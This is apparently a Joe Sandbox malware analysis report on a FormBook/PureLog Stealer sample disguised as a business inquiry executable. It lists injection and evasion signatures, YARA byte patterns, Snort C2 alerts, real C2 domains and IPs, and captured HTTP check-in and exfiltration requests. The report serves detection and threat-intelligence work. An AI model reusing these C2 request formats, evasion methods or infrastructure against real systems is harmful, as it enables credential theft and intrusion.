Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQ No. HDPE-16-GM-00- PI-INQ-3001.exe

Overview

General Information

Sample name:INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
Analysis ID:1431986
MD5:a20e41f9774504d4bace9a2a8a7989c6
SHA1:b7e082069f682b7e35325e53f204d7216573e1e5
SHA256:e20de80a71ce98da7d15176e36f66326ca635c42726f29e87ed0c4b01d2937e7
Tags:exeFormbook
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INQ No. HDPE-16-GM-00- PI-INQ-3001.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe" MD5: A20E41F9774504D4BACE9A2A8A7989C6)
    • INQ No. HDPE-16-GM-00- PI-INQ-3001.exe (PID: 5652 cmdline: "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe" MD5: A20E41F9774504D4BACE9A2A8A7989C6)
      • yTVsQcNOAKqLIKj.exe (PID: 3652 cmdline: "C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7644 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • yTVsQcNOAKqLIKj.exe (PID: 2912 cmdline: "C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x4ba74:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x35043:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:04/26/24-07:43:47.579767
                SID:2855465
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:42:55.058046
                SID:2855465
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:44:17.207461
                SID:2855465
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:43:33.153696
                SID:2855465
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:44:31.943894
                SID:2855465
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:44:03.097055
                SID:2855465
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:44:57.056116
                SID:2855465
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:41:37.699114
                SID:2855465
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:42:10.721609
                SID:2855465
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:42:25.701478
                SID:2855465
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/26/24-07:43:18.530145
                SID:2855465
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: www.onitsuka-ksa.comVirustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for submitted file
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeReversingLabs: Detection: 31%
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeVirustotal: Detection: 50%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeJoe Sandbox ML: detected
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Data.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdbL0vw# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb/l source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: wntdll.pdbUGP source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Nfo.pdbSHA256 source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: Binary string: wntdll.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb0 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdbGCTL source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3681295936.000000000081E000.00000002.00000001.01000000.0000000D.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3676563053.000000000081E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Drawing.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb4 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.pdb, source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294BC00 FindFirstFileW,FindNextFileW,FindClose,21_2_0294BC00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax21_2_02939460
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then pop edi21_2_0294210D

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49722 -> 79.98.25.1:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49730 -> 64.190.62.22:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49734 -> 217.76.128.34:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49742 -> 178.211.137.59:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49746 -> 203.161.46.103:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49750 -> 205.234.233.38:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49754 -> 162.240.81.18:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49758 -> 103.93.124.160:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49762 -> 91.195.240.19:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49766 -> 3.125.172.46:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49770 -> 91.195.240.19:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.www60270.xyz
                Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
                Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
                Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: Joe Sandbox ViewASN Name: TIS-DIALOG-ASRU TIS-DIALOG-ASRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBY6tcFTr5ihP/i1r4jMGBPezmBbp/yafvkg2ntS8iiyqpI2uarI9tc8j7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fairmarty.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.theertyuiergthjk.homesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aprovapapafox.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.83634.cnConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=dYsxpTaff089Ev8jBScoXXc5jj7jmMQs0q0Eu2dlyBwZckm7Y/SiQVQbLF6BJ7sO5g5GU6+4isz0GnabBFwpFqtsgzPEUtDw4CvXwSk6GQMDGBmxey3onV8TCNPZOIX4PotVszp0FWYE&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.polhi.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.valentinaetommaso.itConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.solesense.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
                Source: global trafficDNS traffic detected: DNS query: www.choosejungmann.com
                Source: global trafficDNS traffic detected: DNS query: www.paydayloans3.shop
                Source: global trafficDNS traffic detected: DNS query: www.colchondealquiler.com
                Source: global trafficDNS traffic detected: DNS query: www.www60270.xyz
                Source: global trafficDNS traffic detected: DNS query: www.skibinscy-finanse.pl
                Source: global trafficDNS traffic detected: DNS query: www.avoshield.com
                Source: global trafficDNS traffic detected: DNS query: www.fairmarty.top
                Source: global trafficDNS traffic detected: DNS query: www.theertyuiergthjk.homes
                Source: global trafficDNS traffic detected: DNS query: www.aprovapapafox.com
                Source: global trafficDNS traffic detected: DNS query: www.83634.cn
                Source: global trafficDNS traffic detected: DNS query: www.polhi.lol
                Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
                Source: global trafficDNS traffic detected: DNS query: www.toyzonetshirts.com
                Source: global trafficDNS traffic detected: DNS query: www.solesense.pro
                Source: global trafficDNS traffic detected: DNS query: www.onitsuka-ksa.com
                Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.paydayloans3.shopOrigin: http://www.paydayloans3.shopContent-Type: application/x-www-form-urlencodedContent-Length: 220Cache-Control: max-age=0Connection: closeReferer: http://www.paydayloans3.shop/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 4d 7a 59 44 6b 6c 66 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 70 64 43 64 74 48 32 55 41 6a 41 78 6e 44 6c 48 2b 61 42 61 71 75 2f 79 6f 30 67 75 53 59 34 59 57 67 39 49 41 4b 46 32 66 54 78 62 43 38 75 31 